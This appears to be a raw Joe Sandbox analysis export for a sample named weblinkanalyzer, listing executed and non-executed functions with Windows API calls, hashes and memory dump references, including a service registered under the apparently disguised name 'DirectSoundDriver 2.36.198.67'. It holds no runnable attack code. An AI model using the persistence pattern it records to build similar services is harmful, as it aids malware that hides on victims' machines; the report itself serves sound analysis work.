                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseValue
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3132538880-0
                                                                                                                                                                                                                                  • Opcode ID: f305e60dbf8ce0efdbe8a408dc5de8e7ef3a4bfc8f4f8aeed2f7e4a018db2ef4
                                                                                                                                                                                                                                  • Instruction ID: 6dcc4c43cecca713c479bc083516d2f00d0eb767f36aa46da61f939dff5b1dac
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f305e60dbf8ce0efdbe8a408dc5de8e7ef3a4bfc8f4f8aeed2f7e4a018db2ef4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66D09E70808005EFCF8567908E48AA97A786B04345F110076E243764D48BB5099AAA1E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040D869 Relevance: 3.0, APIs: 2, Instructions: 12timeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 115 40d869-40dcc7 CommandLineToArgvW GetLocalTime call 401f27 120 40dccc 115->120 120->120
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CommandLineToArgvW.SHELL32 ref: 0040D869
                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(0040C2C0), ref: 0040DA36
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ArgvCommandLineLocalTime
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 561774760-0
                                                                                                                                                                                                                                  • Opcode ID: 0df2924218fad12925b943659978a5563a1b0cbfaf9f247c4eee1228d6f38543
                                                                                                                                                                                                                                  • Instruction ID: c9dd54a2f6a0a9ef6b395da460124d2a44ef0955a0893859fe936c8b588cfaf7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0df2924218fad12925b943659978a5563a1b0cbfaf9f247c4eee1228d6f38543
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70D0C935C08102EBC2106BE59A4906876A1AB59355721053BE183F26E0DF78444AEA2E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00402981 Relevance: 1.5, APIs: 1, Instructions: 15registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 127 402981-402989 RegOpenKeyExA 128 4029be 127->128 129 40d0d4-40d8a4 128->129 130 4029c4-4029c7 128->130 130->129 131 40d5c4-40d976 130->131
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Open
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                                                                                                                  • Opcode ID: df93da2a25ddf449426f018fbad1f35667b762f243256c4c25e54ae034fa883e
                                                                                                                                                                                                                                  • Instruction ID: 7df17e09f2432b10eb6c2be66ef450d18aff74beed7de32105507e4b1735c4b5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: df93da2a25ddf449426f018fbad1f35667b762f243256c4c25e54ae034fa883e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7DD09E74D1801AEBD705CAA08E08AFA72A87B04304F5049379557B21C0D7B8D50E575A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040226A Relevance: 1.5, APIs: 1, Instructions: 8registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 140 40226a-402272 RegQueryValueExA 141 40d0ce 140->141 142 40d8a4 141->142 143 40d0d4-40d0d6 141->143 143->142
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegQueryValueExA.KERNELBASE ref: 0040226A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: QueryValue
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3660427363-0
                                                                                                                                                                                                                                  • Opcode ID: 43a4795149afaa95ff49d7760f145aa27886ccc34a94ac535b3cf4f5122f40dc
                                                                                                                                                                                                                                  • Instruction ID: cd8f19b0e75b23b67f056bc5011eb5fb97471f13f622c60d442dd2a780a17e7d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43a4795149afaa95ff49d7760f145aa27886ccc34a94ac535b3cf4f5122f40dc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7B09230E18102FADB255FB89F0C62A29647F447847364D36A857F10E0D6BD8A0AB51E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00402A7C Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 145 402a7c-40dc37 CreateDirectoryA
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateDirectoryA.KERNELBASE ref: 0040DC31
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateDirectory
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4241100979-0
                                                                                                                                                                                                                                  • Opcode ID: 2e1d1612e622339b26055c081b462bb1b5f10dc22293ef15fd6cbdadef8c59f8
                                                                                                                                                                                                                                  • Instruction ID: 0e17b99c545429624e35815a83348e511bd8a70e8ccf8bf3b2f2de9a1ad67a53
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e1d1612e622339b26055c081b462bb1b5f10dc22293ef15fd6cbdadef8c59f8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65A0016599A214DAE22127D05A19A6A69286A1A78132580376382B10E249B9140FA6AF
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040D451 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 147 40d451-40d458 OpenSCManagerA
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ManagerOpen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1889721586-0
                                                                                                                                                                                                                                  • Opcode ID: 9ed5e5ab46a34b1183b54c97295223e3599dc3336d81dfe18ed9d2878a1822e3
                                                                                                                                                                                                                                  • Instruction ID: 1e8d8f9be64fba067e26ba2d448d73f2a2dd91e1f4fcd8f5598b6fd75d9e172d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ed5e5ab46a34b1183b54c97295223e3599dc3336d81dfe18ed9d2878a1822e3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F8A002A02045018AC6915F205FDC419255F6640316B611839D243E00E5CA789449A52E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040D62B Relevance: 1.5, APIs: 1, Instructions: 3registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegCreateKeyExA.KERNELBASE ref: 0040D62B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Create
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                                                                                                                  • Opcode ID: 969777215f77948ced44a4e344d970cab082f1d3304c2fcecb1ab55786fc3155
                                                                                                                                                                                                                                  • Instruction ID: c74dabf9949369d5c62da8fd438f69c3850cb3cf4aa8c6dce4d298867a589fab
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 969777215f77948ced44a4e344d970cab082f1d3304c2fcecb1ab55786fc3155
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C9002203045019AD2501A315B0C2152598550464971104395647E1090DA748109991E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040D578 Relevance: 1.5, APIs: 1, Instructions: 3registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 149 40d578-40d57e RegCloseKey
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                                                                                  • Opcode ID: 3e6d8f56397a6fd8f4d34382528745662e6caf6af1d865ec9120a216119d48a8
                                                                                                                                                                                                                                  • Instruction ID: 046338ef49b4dad716f2584d43b15ea982064a3712732217e229f8b42be1af81
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e6d8f56397a6fd8f4d34382528745662e6caf6af1d865ec9120a216119d48a8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC900271955901A7C24007505F2D9153550611870132184376B46710E189F95407570E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00402994 Relevance: 1.5, APIs: 1, Instructions: 3fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 148 402994-40299a CopyFileA
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CopyFile
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1304948518-0
                                                                                                                                                                                                                                  • Opcode ID: 61d6449afb094023633c684944401277847045becdee46003d3530854dca8aa9
                                                                                                                                                                                                                                  • Instruction ID: 8a9b989459de8ba4b383989f71eab82c3655f6d4a6f9597199558f747d970bc5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61d6449afb094023633c684944401277847045becdee46003d3530854dca8aa9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A9002302041019AD2040A315B9C715276855046C131544796847E0090DA7880496529
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040D1E3 Relevance: 1.3, APIs: 1, Instructions: 3stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcmpi
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1586166983-0
                                                                                                                                                                                                                                  • Opcode ID: 1133d926d828d468f2c0823ec2603520c2d080e7cd513d012715edb874195993
                                                                                                                                                                                                                                  • Instruction ID: 1999ed2a319cb111f58d93e36599d65504c6bfb494e199db35daf75dc5fcdc4b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1133d926d828d468f2c0823ec2603520c2d080e7cd513d012715edb874195993
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F900260304201EFE2000B325F0C31525A46704641712443D5447E0194DA7C8005956A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 004028A4 Relevance: 1.5, APIs: 1, Instructions: 5serviceCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateService
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1592570254-0
                                                                                                                                                                                                                                  • Opcode ID: 2e8116c818adf02881423c3d5d941bf26f5b1a2f7a4fd0b9110157fe06f65c55
                                                                                                                                                                                                                                  • Instruction ID: 0602c40c1dbccdcc73e530ffc71a58eccebc0d0648145afbdcc57a56ac06b62b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e8116c818adf02881423c3d5d941bf26f5b1a2f7a4fd0b9110157fe06f65c55
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1BA02220808002CEC2002FE00E88028A0080082308330883EC30BF00C0CA38C88FB03F
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004023B3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 75registrysynchronizationthreadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegisterServiceCtrlHandlerA.ADVAPI32(DirectSoundDriver 2.36.198.67,0040235E), ref: 004023C1
                                                                                                                                                                                                                                  • SetServiceStatus.ADVAPI32(0040C418), ref: 00402420
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00402422
                                                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00402450
                                                                                                                                                                                                                                  • SetServiceStatus.ADVAPI32(0040C418), ref: 00402480
                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 004024A1
                                                                                                                                                                                                                                  • SetServiceStatus.ADVAPI32(0040C418), ref: 004024CA
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • DirectSoundDriver 2.36.198.67, xrefs: 004023BC
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                                                                                                                                                                                  • String ID: DirectSoundDriver 2.36.198.67
                                                                                                                                                                                                                                  • API String ID: 3346042915-3753546761
                                                                                                                                                                                                                                  • Opcode ID: 5fcb9a5b87dc8469fff6859aaf6bea1fa8643ec6b521037b188f0322a84c0a7e
                                                                                                                                                                                                                                  • Instruction ID: 1a01264c41601166a4e66a8b54459f3afdfc7a3d4d59415bdd3a2783c39f4923
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5fcb9a5b87dc8469fff6859aaf6bea1fa8643ec6b521037b188f0322a84c0a7e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F821D670401210EBD2105F26EFE996A7EACFBC9754751823EE544B22B1C7B90409DF6C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00406AC3 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LCMapStringW.KERNEL32(00000000,00000100,00408658,00000001,00000000,00000000,00000103,00000001,00000000,?,00405537,00200020,00000000,?,00000000,00000000), ref: 00406B05
                                                                                                                                                                                                                                  • LCMapStringA.KERNEL32(00000000,00000100,00408654,00000001,00000000,00000000,?,00405537,00200020,00000000,?,00000000,00000000,00000001), ref: 00406B21
                                                                                                                                                                                                                                  • LCMapStringA.KERNEL32(?,?,?,?,7U@ ,?,00000103,00000001,00000000,?,00405537,00200020,00000000,?,00000000,00000000), ref: 00406B6A
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00405537,00200020,00000000,?,00000000,00000000), ref: 00406BA2
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406BFA
                                                                                                                                                                                                                                  • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406C10
                                                                                                                                                                                                                                  • LCMapStringW.KERNEL32(?,?,?,00000000,7U@ ,?,?,00405537,00200020,00000000,?,00000000), ref: 00406C43
                                                                                                                                                                                                                                  • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406CAB
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: String$ByteCharMultiWide
                                                                                                                                                                                                                                  • String ID: 7U@
                                                                                                                                                                                                                                  • API String ID: 352835431-3990396050
                                                                                                                                                                                                                                  • Opcode ID: 7311542cf2bc8e314ac09162f2172350a795be2e08e0f18793ed5822aaba0d35
                                                                                                                                                                                                                                  • Instruction ID: 02e506ee65740420ae3233abb4e535ac9c0d9cfafd58d7118099ca6790f9c1e8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7311542cf2bc8e314ac09162f2172350a795be2e08e0f18793ed5822aaba0d35
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE51AE71500209EFDF219F54CE49EAF7FB5FB48750F11412AF952B22A0D73A8861EB68
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00406723 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,004053C1,?,Microsoft Visual C++ Runtime Library,00012010,?,0040858C,?,004085DC,?,?,?,Runtime Error!Program: ), ref: 00406735
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040674D
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0040675E
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0040676B
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                  • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                                                                                                                                                                  • API String ID: 2238633743-4044615076
                                                                                                                                                                                                                                  • Opcode ID: d3419985ad88c67346e684d4d63523e685432ef50571a5d9d37b6701a5455ac8
                                                                                                                                                                                                                                  • Instruction ID: 7fc34865fb6cd96f75d35faf7655371ce0829d27f510573cbc416552b2b19a82
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d3419985ad88c67346e684d4d63523e685432ef50571a5d9d37b6701a5455ac8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F018871200301EFCB209FB59EC096F3AE89B98745316183FB145F3291DE7A88118B6D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040697A Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(00000001,00408658,00000001,00000000,00000103,00000001,00000000,00405537,00200020,00000000,?,00000000,00000000,00000001), ref: 004069B9
                                                                                                                                                                                                                                  • GetStringTypeA.KERNEL32(00000000,00000001,00408654,00000001,?,?,00000000,00000000,00000001), ref: 004069D3
                                                                                                                                                                                                                                  • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00405537,00200020,00000000,?,00000000,00000000,00000001), ref: 00406A07
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(7U@ ,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00405537,00200020,00000000,?,00000000,00000000,00000001), ref: 00406A3F
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00406A95
                                                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00406AA7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: StringType$ByteCharMultiWide
                                                                                                                                                                                                                                  • String ID: 7U@
                                                                                                                                                                                                                                  • API String ID: 3852931651-3990396050
                                                                                                                                                                                                                                  • Opcode ID: acbd839e8d8ecd8a78113468315f90f2f487c60c4e6f1d93c346ab407284bb9c
                                                                                                                                                                                                                                  • Instruction ID: 163a86b768802ebad6552dab4735af5f1520240db88ca7a198a85c033bcdd74c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: acbd839e8d8ecd8a78113468315f90f2f487c60c4e6f1d93c346ab407284bb9c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28418D71600209AFCF209F94CD86EAF3B69FB05750F11453AFA12B2290C7398D649B99
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040529D Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 0040530A
                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F4,0040858C,00000000,?,00000000,00000000), ref: 004053E0
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000), ref: 004053E7
                                                                                                                                                                                                                                  Strings
